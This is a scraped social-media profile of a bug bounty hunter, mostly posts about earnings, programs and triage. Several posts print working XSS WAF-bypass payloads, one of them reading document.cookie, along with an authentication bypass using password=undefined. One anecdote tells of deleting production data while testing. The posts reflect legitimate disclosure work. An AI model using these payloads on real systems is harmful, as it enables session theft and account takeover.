🇪🇨🍫 Profile
🇪🇨🍫

@bxmbn

Followers
17,698
Following
1
Media
162
Statuses
1,390

against the odds

Ecuador
Joined March 2019
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@bxmbn
🇪🇨🍫
10 months
This year I Completed 500k in bounties Most rewarded vulnerabilities and the ones I always focused since the beginning: 1. XSS (all types) 2. Cache Poisoning 3. BACs Reached this amount totally from scratch, learning from the internet. No certs. 0 Automation. 0 Collabs.
124
141
2K
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
114
1K
@bxmbn
🇪🇨🍫
11 months
🎃
Tweet media one
Tweet media two
Tweet media three
64
53
1K
@bxmbn
🇪🇨🍫
1 year
Total Earnings by Year 2020 - $850.00 2021 - $19,750.00 2022 - $86,744.50 2023 So Far - $168,034.00 17 y/o me never thought about it, started with 0 Knowledge, curious trying to make money while being at home due to the pandemic, with patience it became my main source of income
Tweet media one
87
113
1K
@bxmbn
🇪🇨🍫
1 year
While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
Tweet media one
27
278
1K
@bxmbn
🇪🇨🍫
1 year
If you are a beginner in bug bounty I recommend don’t ever buy any courses, nor look for mentors Nothing will guarantee you success in bug bounty I learned and keep learning myself by googling, reading hacktivity reports etc never spent a single dollar to learn Just an advice
42
106
807
@bxmbn
🇪🇨🍫
1 month
What is this 😭 username=bombon&password=undefined 200 OK username=AnyUser&password=undefined 200 Ok It gives you the access token just by providing the username and requesting the password as ‘undefined’ letting you to basically authenticate to any account..
Tweet media one
Tweet media two
31
69
754
@bxmbn
🇪🇨🍫
2 years
Been hunting for almost 3 years now, only focusing in XSS, learned other vuls by just reading never bought courses, don’t use automation tools, not even burp pro and still manage to make a solid monthly income Its not hard, if you see it hard, then it will be hard.
48
72
689
@bxmbn
🇪🇨🍫
4 months
It was worth the wait CVE-2023-35813
Tweet media one
23
24
668
@bxmbn
🇪🇨🍫
1 year
I was rewarded $9.600 bounties 2day and achieved what seemed to be impossible for a long time Top 100 All-Time ✅
Tweet media one
Tweet media two
51
30
635
@bxmbn
🇪🇨🍫
1 year
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅ It’s just art at this point 🎨🖌️
Tweet media one
Tweet media two
Tweet media three
41
106
624
@bxmbn
🇪🇨🍫
6 months
March's total Bounties: $32,119 5 Broken Access Control: $17,237 4 Reflected XSS = $9,671 2 Cache Deception = $2,789 1 Cache Poisoning - Stored XSS = $1,250 Retests and Bonuses: $1,172
40
25
629
@bxmbn
🇪🇨🍫
1 year
Today's XSS in a Multi-Reflection case: xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
Tweet media one
20
145
617
@bxmbn
🇪🇨🍫
1 year
Everything after /? is being reflected ?xss is reflected as Uppercase =xss as Lowercase The app is using Imperva WAF, however that feature allowed me to bypass it using: %3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
Tweet media one
Tweet media two
Tweet media three
21
100
589
@bxmbn
🇪🇨🍫
1 year
June was the best one 🫡
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
114
1K
74
37
575
@bxmbn
🇪🇨🍫
1 year
My main goal is to get a million bounties and prove to all of you that you can success in Bug Bounty only by: knowing the basics. Not using tools/automation. Thinking like a real black hat.
33
38
568
@bxmbn
🇪🇨🍫
1 year
Top bb hunters stay at top because they never share their methodology, and if they do, it is always for a few people, never publicly This is probably one of the reasons why most of them have never even disclosed a single report.
58
36
566
@bxmbn
🇪🇨🍫
1 year
Blocked: <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) Bypass: <details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
Tweet media one
Tweet media two
20
138
555
@bxmbn
🇪🇨🍫
1 year
This program rewards bounties even on weekends This program’s dedication is the reason why I’m having success
Tweet media one
22
17
483
@bxmbn
🇪🇨🍫
7 months
Stored XSS using Google Reviews 2 If you wonder why I submitted the review like that It was because if I put </script> Google would render as blank (try it) So I submitted another review with another account Containing the rest of the payload so it could work ><svg onload=..
Tweet media one
Tweet media two
13
67
494
@bxmbn
🇪🇨🍫
5 months
April's total Bounties: $11,689 5 Reflected XSS = $6,948 3 Broken Access Control: $1,400 1 Cache Deception = $3,000 Retests and Bonuses: $341 Worst bounty month since January of last year ($8,519)
Tweet media one
43
8
490
@bxmbn
🇪🇨🍫
1 year
Story Time: @Agornello Caesar (turtle_shell) was the one who taught me about Cache Poisoning without even asking for it, after that report my life pretty much changed, I took every advice and took advantage of it This is how important Triagers can be in the life of a researcher
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@Agornello
nadino
1 year
Today was my last day working at @Hacker0x01 ! It has been an incredible journey and I had the pleasure to work with an amazing team. Much kudos to all the triagers out there, it's a hard job and they are real heroes. Also <3 to (most of) the hackers. turtle_shell / caesar
50
3
355
26
41
482
@bxmbn
🇪🇨🍫
1 year
Great start this month 🍁
Tweet media one
Tweet media two
35
17
463
@bxmbn
🇪🇨🍫
9 months
Write ups coming up in 2024: - Accessing 30 Million User’s Orders - How I was able to steal your Insurance Plan - UI:None Cache Poisoning/Deception Cases - Stealing Bank Mail Offers To PII Leak - Akamai Biggest Problem Comment which one you want to see first 🤔
68
31
473
@bxmbn
🇪🇨🍫
24 days
I just found a bypass of this writeup I did last year Writeup by the end of September 🤙🏽
Tweet media one
9
39
483
@bxmbn
🇪🇨🍫
1 year
😌
Tweet media one
27
10
458
@bxmbn
🇪🇨🍫
1 year
Its been 3 years since I started bug bounty hunting 600+ resolved reports in ~100 Companies Still so much to learn and so much to earn as well 🫶🏽
Tweet media one
Tweet media two
45
20
448
@bxmbn
🇪🇨🍫
1 year
Tweet media one
26
10
425
@bxmbn
🇪🇨🍫
1 year
Thank you to all cdn providers for inventing caching Special mention to devs who don’t sanitize headers and cookies either 🫡
Tweet media one
26
38
423
@bxmbn
🇪🇨🍫
1 year
magicId=00192729301 Set-Cookie: SessionId=<sessionId.00192729301> magicId=00192729302 Set-Cookie: SessionId=<sessionId.00192729302> 2023 and we still have these types of bugs lol By the way, this is P1 In my books 🤓👆🏽
Tweet media one
19
51
421
@bxmbn
🇪🇨🍫
1 year
Will June be a good one too? 📝✍🏽 I just need more private invites 🤞🏽
Tweet media one
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
114
1K
29
19
413
@bxmbn
🇪🇨🍫
1 year
Updated my H1 Profile 🫡
Tweet media one
34
18
402
@bxmbn
🇪🇨🍫
1 year
Each parameter reflects as Event Attributes in each Input tag, but each parameter is limited to 10 characters Being limited to 10 characters was a good thing because it also allowed me to bypass the WAF 🤓 VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus
Tweet media one
Tweet media two
13
72
413
@bxmbn
🇪🇨🍫
1 year
Critical Bounty today to finally reach the 10,000 Rep Milestone It’s crazy that few days ago I was at 8,384 Rep🔝
Tweet media one
Tweet media two
Tweet media three
26
6
390
@bxmbn
🇪🇨🍫
1 year
Request header is easy to find as it’s a response header that reflects in all pages, they also have a public program, affects main domain, and a lot of hackers who know this attack in the leaderboard, maybe this can confirm I have the best WAF bypass 😌
Tweet media one
17
30
383
@bxmbn
🇪🇨🍫
5 months
We all agree Bug Bounty is: 50% Luck 50% Skill ?
66
16
386
@bxmbn
🇪🇨🍫
1 year
2024
Tweet media one
Tweet media two
15
21
378
@bxmbn
🇪🇨🍫
1 year
You see the results but behind this, there were a lot of NAs, duplicates, Informatives, especially when I first started, months of not finding anything The difference is that I never quit 💪🏽
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
114
1K
27
31
373
@bxmbn
🇪🇨🍫
1 year
My tweets were able to get me an invite 🙏🏽 I might be able to continue at the top 🤞🏽
Tweet media one
12
12
368
@bxmbn
🇪🇨🍫
1 year
😼
Tweet media one
Tweet media two
32
13
358
@bxmbn
🇪🇨🍫
11 months
High 8.9 = $2,000 Critical = $5,000 😔👍🏽
Tweet media one
11
15
339
@bxmbn
🇪🇨🍫
1 year
💰✅
Tweet media one
@bxmbn
🇪🇨🍫
1 year
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅ It’s just art at this point 🎨🖌️
Tweet media one
Tweet media two
Tweet media three
41
106
624
23
28
349
@bxmbn
🇪🇨🍫
9 months
There are some changes guys 😝 • I cannot do the Akamai one yet, but sometime in 2024 I should have the green light • There was actually a mistake, It’s 3 Million not 30, Still a mass data breach due to the sensitive info exposed Will publish 2 blogs in January 5th
Tweet media one
@bxmbn
🇪🇨🍫
9 months
Write ups coming up in 2024: - Accessing 30 Million User’s Orders - How I was able to steal your Insurance Plan - UI:None Cache Poisoning/Deception Cases - Stealing Bank Mail Offers To PII Leak - Akamai Biggest Problem Comment which one you want to see first 🤔
68
31
473
10
26
346
@bxmbn
🇪🇨🍫
9 months
Goals for the new year? None. I had none last year and it was my most successful year in every aspect to date that my old self wouldn’t even believe it If you set goals, you are limiting yourself, you could do more than anything you set today Happy New Year!
13
15
314
@bxmbn
🇪🇨🍫
1 year
Got some delayed bounties In September T-Mobile BBP Robbed me like 15k fixing crits and not paying but all good 😝
Tweet media one
Tweet media two
Tweet media three
Tweet media four
13
15
309
@bxmbn
🇪🇨🍫
1 year
Hackerone vs Bugcrowd Programs with higher bounties Winner: Bugcrowd Exclusive programs (Top Companies) Winner: H1 Support Winner: Bugcrowd Triagers (communication, knowledge and response times) Winner: H1 (by a lot)
16
20
305
@bxmbn
🇪🇨🍫
2 months
I’m back I think, I need more invites 🫵🏽
Tweet media one
Tweet media two
16
4
292
@bxmbn
🇪🇨🍫
5 months
Tweet media one
Tweet media two
17
17
290
@bxmbn
🇪🇨🍫
1 year
August ☀️
Tweet media one
Tweet media two
Tweet media three
25
12
289
@bxmbn
🇪🇨🍫
1 year
Waking up and seeing this I call this passive income 🤓👆🏽
Tweet media one
25
10
276
@bxmbn
🇪🇨🍫
1 month
Triagers need to learn from program managers sometimes 🤙🏽
Tweet media one
Tweet media two
13
8
275
@bxmbn
🇪🇨🍫
7 months
Today, I learned that if there is a bypass I should not name the title of the report “Bypass of …” anymore
Tweet media one
9
12
268
@bxmbn
🇪🇨🍫
6 months
Tweet media one
14
8
263
@bxmbn
🇪🇨🍫
1 year
I have probably the best Akamai XSS bypass until date It works everytime, I could share it but if i do, Akamai will fix it Devs should sanitize their inputs so that they dont rely on WAF, plus I make more money 😼🤝🏼😼
26
7
249
@bxmbn
🇪🇨🍫
1 year
Will disconnect for a while🫡 Finished sending my last reports, Hopefully they get all triaged so they can cover all my expenses for the following days 🛫🏝️
Tweet media one
Tweet media two
21
2
251
@bxmbn
🇪🇨🍫
1 year
Scope Updates and Private Invites = 💰
Tweet media one
Tweet media two
Tweet media three
Tweet media four
13
11
255
@bxmbn
🇪🇨🍫
5 months
My reaction when my hardest xss bypass gets closed as an ‘internal’ duplicate
Tweet media one
17
8
254
@bxmbn
🇪🇨🍫
5 months
Me after reporting a Critical CVE and getting rewarded a Critical Bounty
Tweet media one
5
6
245
@bxmbn
🇪🇨🍫
1 year
Found a vulnerable request that always loads when navigating through the app The cache duration is great I just need to wait until it expires and poison it with XSS to achieve ZERO UI Stored XSS And the best part of it: Big company + I use their services
Tweet media one
7
13
238
@bxmbn
🇪🇨🍫
9 months
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
Tweet media one
15
11
235
@bxmbn
🇪🇨🍫
6 months
More and more BBPs programs leaving/closing at a crazy rate New VDPs every month Almost 300 Reports in less than a week for this new VDP We are doomed.
Tweet media one
Tweet media two
33
15
229
@bxmbn
🇪🇨🍫
1 year
Finally man!! last time I got multiple invitations was literally a year ago Time to make more bounties before the year ends 🙏🏽
Tweet media one
11
6
223
@bxmbn
🇪🇨🍫
9 months
Gotta keep your eyes open ✅
Tweet media one
@bxmbn
🇪🇨🍫
9 months
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
Tweet media one
15
11
235
12
8
220
@bxmbn
🇪🇨🍫
1 year
I’m making more than the average and most professions Getting into Bug bounty was the best decision I took even though I tried to quit at somepoint because I was not seeing results, Life its about decisions Great things never come easy Top 100 All time Soon
Tweet media one
Tweet media two
21
9
217
@bxmbn
🇪🇨🍫
6 months
Some of the reasons why VDPs still exist today: *VDP-only hackers this year so far*
Tweet media one
Tweet media two
24
7
216
@bxmbn
🇪🇨🍫
11 months
Got a bank offer to my mail, and found a very nice IDOR
Tweet media one
Tweet media two
6
6
214
@bxmbn
🇪🇨🍫
11 months
Cache Poisoning XSS that does not require a file extension to cache and affects multiple pages should be treated as Critical It’s insane that still to this day and after reporting them multiple times, the severity is treated as it was a normal limited stored XSS
6
11
214
@bxmbn
🇪🇨🍫
2 years
In 14 days I will be disclosing two reports Can't wait for you to see these, especially the XSS one, it was a pretty clever find!
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
9
208
@bxmbn
🇪🇨🍫
8 months
3 Months ago, I bought stocks from a company using some of the bounties I earned with them and the company it’s up more than 40% now
Tweet media one
12
3
208
@bxmbn
🇪🇨🍫
1 year
don’t report bugs to vdps, especially those who are multi-millionare companies this way we can force them to open bbps 😝
9
13
200
@bxmbn
🇪🇨🍫
6 months
Me when VDP points get removed from all platforms and seeing all VDP Hackers go down to 0 points:
20
6
202
@bxmbn
🇪🇨🍫
6 months
Proud to have a 740 credit score and 100k available credit at 20 years old in just 2 years of credit 🔐
13
4
201
@bxmbn
🇪🇨🍫
11 months
At least they rewarded the bounty before banning me It was a good program after all made 110k in this program alone But they disappointed me with their decision
Tweet media one
@bxmbn
🇪🇨🍫
11 months
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
168
11
6
197
@bxmbn
🇪🇨🍫
6 months
Tweet media one
Tweet media two
Tweet media three
Tweet media four
19
22
201
@bxmbn
🇪🇨🍫
1 year
Today was also retesting day in H1👌🏽
Tweet media one
Tweet media two
Tweet media three
5
3
199
@bxmbn
🇪🇨🍫
1 year
For anyone wondering more than half of my earnings are just XSS vulnerabilities. Q2 2022 is when I learned about Cache Poisoning This is why you see the increase on bounties since I found multiple Stored XSS via Cache Poisoning and stuck with it afterwards.
Tweet media one
3
3
190
@bxmbn
🇪🇨🍫
1 year
Best Triagers in Hackerone Caesar Carlos Alexander Juan Moe Decimo
20
10
192
@bxmbn
🇪🇨🍫
6 months
Average life of BBP-Only Hunters
12
5
191
@bxmbn
🇪🇨🍫
1 year
Most of my generation will be graduating by 25 and they might have saved a bit of money Me at 20 I’m on my way to retire at 25 📈 🤞🏽
10
12
180
@bxmbn
🇪🇨🍫
11 months
I noticed that you get private invitations based on what you search on google I was looking at for cars at 1am today and got a private Invite from a Car company at 4 am I was able to confirm this since I saw the same behavior on the other platform I hunt already.
19
4
187
@bxmbn
🇪🇨🍫
6 months
People that hunt on vdps is what keep them alive We can all force them to open BBP’s only if nobody hunts on VDPs
@SchizoDuckie
🦆 SchizoDuckie 🦆
6 months
Presented without further comment.
Tweet media one
Tweet media two
Tweet media three
10
3
90
16
17
186
@bxmbn
🇪🇨🍫
6 months
@mouka0x Hashtag in this post: #BugBounty 💰 Your Bounties: $0,0000 😔 AON VDP: Thank you so much, I don’t need to open a BBP anymore 😊🥰
13
1
181
@bxmbn
🇪🇨🍫
1 year
Feels good when you receive an program invite and you use their services already So far: 1 critical 1 High 7 Mediums This always lets you have a huge advantage, especially on a program with limited scope, since others hackers need to go to the process of creating an account
7
5
179
@bxmbn
🇪🇨🍫
11 months
Stored XSS ≠ Oauth Misconfiguration 🤓👆🏽
Tweet media one
Tweet media two
2
9
179
@bxmbn
🇪🇨🍫
1 year
DM's are Open If you need help on anything Just dm :)
15
2
172
@bxmbn
🇪🇨🍫
1 year
You have to love NOT finding bugs in order to success in bug bounty.
12
9
174
@bxmbn
🇪🇨🍫
6 months
Programs leaving at this rate is crazy 🧐
Tweet media one
Tweet media two
21
2
176
@bxmbn
🇪🇨🍫
1 year
Found an XSS endpoint where the server creates files without sanitation you can create a file then share it to anyone, you can also edit user’s files to save XSS on it using the uniqueId which is vulnerable to IDOR Whats Your CVSS Score?
18
7
175
@bxmbn
🇪🇨🍫
1 year
Always wondered why Chinese companies offer such low bounties
Tweet media one
Tweet media two
21
12
170
@bxmbn
🇪🇨🍫
10 months
😸
Tweet media one
@bxmbn
🇪🇨🍫
11 months
Privileges Required: Low
Tweet media one
Tweet media two
2
0
32
8
2
171
@bxmbn
🇪🇨🍫
1 year
I finally got it🫡
Tweet media one
9
3
171
@bxmbn
🇪🇨🍫
11 months
This program is just unbelievable, they have Mass PII leak as Critical, I reported mass PII Leak and they only rewarded as High. They didn’t follow their own policy, nor explained why. But then I found an RXSS and they did followed their policy this time and rewarded as Low 🙂
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
9
173
@bxmbn
🇪🇨🍫
11 months
I’m by myself in a program with 446 rep points and a total of 32,900 in bounties paid Top bounty:5k While I’m also in another program where there is only 1 hacker that has earned 20,000 in bounties but WITH 444 rep points Top Bounty: 3k Rep system is broken in H1 😭
7
5
169
@bxmbn
🇪🇨🍫
1 year
Hackerone should pay me for indirectly promoting them 😂 Like everytime I tweet about my bounties new people ask me how to start I will be happy only with more private invites tho @Hacker0x01 👀
13
6
167
@bxmbn
🇪🇨🍫
1 year
Biggest tip I can give you Dont get mad or sad of others success If you get mad as a result of others people’s success you are not going no where, you are lost.. Instead take as a challenge. you will overcome yourself and will help you in anything in life
7
13
163
@bxmbn
🇪🇨🍫
11 months
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
168
@bxmbn
🇪🇨🍫
1 year
1 year as a H1 Clear Member I have seen few to zero benefits from what they state you will get as a H1 Clear member....
Tweet media one
Tweet media two
7
2
161
@bxmbn
🇪🇨🍫
6 months
I never attacked anyone, If you can make these amounts of points in vdps you have the ability to do the same in a bbp thats all They said it’s not of my business, but if more companies see they can still get good-impactful-quality reports without having to reward, we’re fucked.
@bxmbn
🇪🇨🍫
6 months
Some of the reasons why VDPs still exist today: *VDP-only hackers this year so far*
Tweet media one
Tweet media two
24
7
216
14
6
164